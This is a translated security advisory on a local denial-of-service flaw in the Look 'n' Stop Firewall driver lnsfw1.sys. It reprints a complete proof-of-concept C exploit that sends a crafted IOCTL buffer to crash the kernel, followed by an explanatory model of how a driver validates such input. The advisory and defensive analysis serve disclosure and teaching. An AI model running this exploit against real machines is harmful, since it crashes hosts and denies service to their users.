Look 'n' Stop Firewall "lnsfw1.sys" Driver IOCTL Local Denial of Service Vulnerability

Published: 2011-01-21
Updated: 2011-01-24

Affected systems:
Look 'n' Stop Firewall 2.07
Look 'n' Stop Firewall 2.06
Description:
BUGTRAQ ID: 45949

Look 'n' Stop Firewall is a personal firewall product from France.

The "lnsfw1.sys" driver shipped with Look 'n' Stop Firewall contains a vulnerability in its IOCTL handling: a local attacker who can open the driver's device can send it a crafted DeviceIoControl request and trigger a kernel bug check (BSOD). This is a denial of service against the whole host, not just the firewall application.

<*Source: Heurs (heurs@ghostsinthestack.org) *>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <conio.h>     /* getch() */
#include <stdlib.h>
#include <string.h>

/*
Program          : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage         : http://www.looknstop.com
Discovery        : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description

Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.

//----- Description of vulnerability

The lnsfw1.sys driver generates a BSOD (bug check) when it receives a
particular IOCTL value. The kernel then halts and waits for a kernel
debugger to act.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

*/

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    DWORD NombreByte = 0;   /* bytes returned by DeviceIoControl */
    /* 163 DWORDs (652 bytes) of input that triggers the bug check;
       0x28b (651) of them are passed to the driver below. */
    DWORD Crashing[] = {
        0x200ff822, 0xd24b37a1, 0x8ce055dc, 0x70b3d269,
        0x3d2ef498, 0xcdd0e57c, 0xf2699fab, 0xed753dcb,
        0xfdde2a99, 0x90590b61, 0x28011112, 0xeb35191c,
        0x36f0e1e7, 0xef7ee764, 0x09b01e1f, 0x0bb86825,
        0x1b886612, 0xd8c289df, 0xaa21ad45, 0x6fa7a76d,
        0x13492a54, 0x7c2bc443, 0x65dbf582, 0xffeb86cc,
        0xf48ca4fd, 0x75542bb5, 0xd05638ba, 0x3876e368,
        0x678ba399, 0x6779f15c, 0x8f89ff55, 0xc8b9cf02,
        0x033b9857, 0x82eef1a9, 0xf0dba3b6, 0xadf5b8f6,
        0x033ef961, 0x393f043b, 0x515896fd, 0x28d10e25,
        0x37b7f707, 0x1a425f92, 0x4bc6acfb, 0x45390605,
        0x0be40107, 0xf121a706, 0x4b4c0e31, 0x88889f12,
        0x0c60806d, 0x03af4569, 0xe5b68798, 0xb22bd966,
        0xd532fe7f, 0x19a7213a, 0x6927f7f5, 0xcd4c3202,
        0x96831f6b, 0x1d09991d, 0x48d1da67, 0x68f24415,
        0xbb01a216, 0xdb6b634a, 0x18e36cb4, 0xcd7265c2,
        0x64b81111, 0x4305d1b3, 0xc4f1ee8d, 0xfcd61343,
        0xb8bfc8b9, 0x8a1a5541, 0xe9c3adcb, 0xca4c2a56,
        0x89a67e7d, 0x74b8704e, 0xfe70e4d6, 0x27612082,
        0xd8e211d7, 0x190ec39c, 0x380dfc09, 0x8d649b0c,
        0xeda15e23, 0xe2e76319, 0xc781f249, 0x4cb25434,
        0xeff3dc6a, 0xa0a6e976, 0x57014474, 0x98629b36,
        0x2cc9fb9d, 0xa6a8b31b, 0xa3fbef44, 0xfeb130d3,
        0x91e8c96b, 0xdc953762, 0x77341f7c, 0xd4ec9d26,
        0x8504a663, 0x1da0406a, 0x8a049adf, 0x0f2ca8ef,
        0xbc93ec1e, 0x027bdfad, 0x4c8885f6, 0x1c30be98,
        0x0ec01493, 0x124d4252, 0x0765f8c1, 0x801652da,
        0x778a6e6a, 0x09ef17aa, 0x6ece13fd, 0xa7280f9c,
        0xcf6235f9, 0xabdeae81, 0x8145979e, 0x45af7871,
        0xed3d36e0, 0x9e223b88, 0xfe26e7f2, 0xe13743f1,
        0xa8171a6e, 0x611c303f, 0x252a68d2, 0xd013e026,
        0x1259b868, 0xf673c420, 0x27a60840, 0xd87eed92,
        0xef872203, 0x26868592, 0x18324bc9, 0xed47e068,
        0xf2c0b162, 0x95966d8e, 0x07cc53db, 0xe8360489,
        0x7c630b42, 0x8ab52dd9, 0xc5bf0c0e, 0xae8a8284,
        0x97a0a5ab, 0x0cccb1c4, 0x4d768275, 0x1101e67e,
        0x16e2f2c3, 0x82b7686a, 0x5b26314e, 0x52f74f38,
        0xcb341107, 0xa59c70d0, 0x3327af19, 0xdd51188f,
        0x54636221, 0xa05f288a, 0xeb7d4a3a, 0x2065885d,
        0xb103190e, 0xd36e7e1e, 0xf7a7d560, 0xc62c828d,
        0x9fc687e9, 0xcf609352, 0x00e96253
        };
    printf("0day Local DoS - Look 'n' Stop 2.06p4\n\n");

    /* Open the firewall driver's control device. No special privilege is
       requested, so an ordinary local user reaches this dispatch routine. */
    hDevice = CreateFileA("\\\\.\\LNSFW1", GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("CreateFile failed: %lu\n", GetLastError());
        return 1;
    }
    printf("Device handle: %p\n", hDevice);

    /* IOCTL 0x80000064 (custom device type 0x8000, function 0x19, METHOD_BUFFERED)
       with 0x28b bytes of the payload as input and no output buffer. On a
       vulnerable driver the machine bug checks here and the lines below never run. */
    if (!DeviceIoControl(hDevice, 0x80000064, Crashing, 0x28b, NULL, 0, &NombreByte, NULL))
        printf("DeviceIoControl failed: %lu (no crash)\n", GetLastError());

    printf("Sploit Send.\n\n");
    CloseHandle(hDevice);
    getch();
    return 0;
}
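The control code the exploit sends, 0x80000064, follows the standard Windows CTL_CODE() layout: device type 0x8000 (a vendor-defined type), function 0x19, METHOD_BUFFERED and FILE_ANY_ACCESS. With METHOD_BUFFERED the I/O manager copies the caller's bytes into a system buffer before the driver sees them, so the only things standing between a user-mode process and a bug check are the driver's own checks on the input length and on every field it trusts. The program below is an added example, not code from the advisory or from Look 'n' Stop: it decodes the IOCTL fields and models, in portable C, the dispatch-side validation a driver should perform. The request structure (fw_rule_request), the function number it handles and the constructed inputs are assumptions for illustration; nothing here describes how lnsfw1.sys actually parses its input.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the advisory or from Look 'n' Stop.
 * The IOCTL encoding and NTSTATUS values are the real Windows ones;
 * the request structure and handler are hypothetical. */

/* NTSTATUS values (from ntstatus.h) */
#define STATUS_SUCCESS                0x00000000u
#define STATUS_INVALID_DEVICE_REQUEST 0xC0000010u
#define STATUS_BUFFER_TOO_SMALL       0xC0000023u
#define STATUS_INVALID_PARAMETER      0xC000000Du

/* CTL_CODE(DeviceType, Function, Method, Access) =
 *   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method */
#define METHOD_BUFFERED 0u

struct ioctl_fields {
    uint32_t device_type;  /* bits 31..16 */
    uint32_t access;       /* bits 15..14, FILE_ANY_ACCESS = 0 */
    uint32_t function;     /* bits 13..2 */
    uint32_t method;       /* bits 1..0 */
};

struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Hypothetical fixed-size request our model handler expects for function 0x19 */
struct fw_rule_request {
    uint32_t rule_index;    /* must be < MAX_RULES */
    uint32_t action;        /* 0 = block, 1 = allow */
    uint8_t  reserved[24];
};
#define MAX_RULES        64u
#define HANDLED_DEVTYPE  0x8000u
#define HANDLED_FUNCTION 0x19u
#define HANDLED_IOCTL    0x80000064u

/* Model of IRP_MJ_DEVICE_CONTROL for a METHOD_BUFFERED request: the I/O
 * manager has copied the caller's bytes into system_buffer and reports
 * input_len. The driver must check the length before reading the struct and
 * validate every field it later uses as an index, count or length. */
uint32_t handle_device_control(uint32_t code, const void *system_buffer, size_t input_len)
{
    struct ioctl_fields f = decode_ioctl(code);
    if (f.device_type != HANDLED_DEVTYPE || f.function != HANDLED_FUNCTION ||
        f.method != METHOD_BUFFERED)
        return STATUS_INVALID_DEVICE_REQUEST;
    if (system_buffer == NULL || input_len < sizeof(struct fw_rule_request))
        return STATUS_BUFFER_TOO_SMALL;

    struct fw_rule_request req;
    memcpy(&req, system_buffer, sizeof req);   /* copy, then validate the copy */
    if (req.rule_index >= MAX_RULES || req.action > 1u)
        return STATUS_INVALID_PARAMETER;
    return STATUS_SUCCESS;
}

/* Constructed inputs: a well-formed request, the first 32 bytes of the
 * exploit's Crashing[] array, a truncated buffer and an unhandled code. */
uint32_t check_well_formed(void)
{
    struct fw_rule_request req;
    memset(&req, 0, sizeof req);
    req.rule_index = 3u;
    req.action = 1u;
    return handle_device_control(HANDLED_IOCTL, &req, sizeof req);
}

uint32_t check_crash_prefix(void)
{
    static const uint32_t prefix[8] = {   /* first eight DWORDs of Crashing[] */
        0x200ff822u, 0xd24b37a1u, 0x8ce055dcu, 0x70b3d269u,
        0x3d2ef498u, 0xcdd0e57cu, 0xf2699fabu, 0xed753dcbu };
    return handle_device_control(HANDLED_IOCTL, prefix, sizeof prefix);
}

uint32_t check_truncated(void)
{
    uint32_t one_dword = 0u;
    return handle_device_control(HANDLED_IOCTL, &one_dword, sizeof one_dword);
}

uint32_t check_unknown_code(void)
{
    struct fw_rule_request req;
    memset(&req, 0, sizeof req);
    return handle_device_control(0x80000068u, &req, sizeof req);  /* function 0x1a */
}

int main(void)
{
    struct ioctl_fields f = decode_ioctl(HANDLED_IOCTL);
    printf("IOCTL 0x%08x: device type 0x%x, function 0x%x, method %u, access %u\n",
           HANDLED_IOCTL, f.device_type, f.function, f.method, f.access);
    printf("well-formed:  0x%08x\n", check_well_formed());
    printf("crash prefix: 0x%08x\n", check_crash_prefix());
    printf("truncated:    0x%08x\n", check_truncated());
    printf("unknown code: 0x%08x\n", check_unknown_code());
    return 0;
}
```

In a real driver the same checks read the length from the IRP stack location (Parameters.DeviceIoControl.InputBufferLength) rather than a function argument, and a METHOD_NEITHER request additionally needs ProbeForRead under __try/__except. The other half of the fix is access control: because the exploit opens \\.\LNSFW1 with no special privilege, the device object's security descriptor decides who can reach this dispatch routine at all.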

Recommendation:
Vendor patch:

Look 'n' Stop Firewall
----------------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for a fixed version:

http://www.looknstop.com/En/index2.htm

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.